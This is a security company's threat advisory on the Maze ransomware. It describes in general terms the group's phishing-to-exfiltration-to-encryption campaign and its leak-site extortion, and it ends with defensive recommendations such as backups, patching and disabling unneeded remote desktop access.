Threat Advisory: Re-Emergence of the Maze Ransomware

April 20, 2020

Herjavec Group continues to track COVID-19 related cyberattacks. We have a complete threat advisory tracking various threats, malware types, as well as a summary of IOCs and domains specific to COVID-19. The full advisory can be found here.

The Maze ransomware was initially discovered in May 2019, and since then the attack frequency has increased and the group behind it has brought new traits to the forefront. The group conducted a large number of campaigns in late 2019 and has not slowed down since the emergence of the COVID-19 pandemic.

The campaign starts with a phishing email designed to compromise a single host and has been found to use a CobaltStrike payload on multiple occasions during this stage. CobaltStrike is an offensive framework typically used by Red Team operators in security exercises to move laterally throughout the network by using it to deploy additional tools and malware.

Once the threat group gains access to the network, the priority is to expand the footprint by compromising and gathering data from other hosts by leveraging exploit kits and remote desktop connections with weak passwords. After the group has access to a number of systems and accumulates enough data, they use 7-Zip to compress the data before exfiltrating it to a remote FTP server using PowerShell. Lastly, the Maze ransomware is deployed to all compromised systems. 

Since the goal of ransomware is to exploit the victims for financial payment, Maze is configured to exfiltrate the data from the compromised host. If no payment is made, the threat group posts the data on its public website as proof of compromise. This maneuver acts as an additional incentive for organizations to pay the ransom despite being able to fully restore the infected machines and recover the data.  

As a result, this extortion tactic has also started to be adopted by other ransomware operators (e.g. Revil/Sodinokibi) to increase the likelihood of organizations paying the ransom demanded. 

Known verticals targeted by Maze include legal, oil and gas, online gambling, insurance providers, utility equipment suppliers, logistics, construction, government, manufacturing, medical research, consulting, engineering, and higher education.

Recommendations

In order to reduce the risk of falling victim to the Maze ransomware, it is imperative your team manages a strong security awareness program and proactively messages employees around the threat of phishing emails. Employees should never open suspicious emails, download attachments or click on URLs without validating the sender or the content’s legitimacy.

Please review best practices on how to spot a phishing email and how your organization can enable a strong cyber hygiene program for more information. 

HG also recommends:

1. Having a strong backup policy in place with periodic backups that are stored off of the network
2. Being up-to-date on your antivirus software licenses
3. Maintaining strong cyber hygiene with up to date system patches
4. Disabling Remote Desktop Connections that are not needed

For Herjavec Group Managed Security Services Customers, Herjavec Group’s Managed Services team will be proactively blocking names/IP addresses where applicable, following documented change processes as per usual.

For more information on how Herjavec Group can help your organization with an emergency preparedness plan, Managed Phishing program, or cyber technology support, please connect with us.

Herjavec Group circulates US – CERT/CISA advisories as this notification warrants attention and may have significance to your Enterprise network environment. If the following advisory is applicable to your environment, Herjavec Group recommends your IT team review the technical details included and monitor your environment for any susceptible systems. Herjavec Group’s analysts are working with applicable vendor partners to apply detection and mitigation strategies where appropriate. For Managed Services customers, our Managed Services team will engage with the appropriate technical contacts in your respective organizations directly to provide alerts, escalations, actions and or reports based on our service agreement with you. If you have questions or concerns, please engage your Herjavec Group account representative directly or contact Herjavec Group.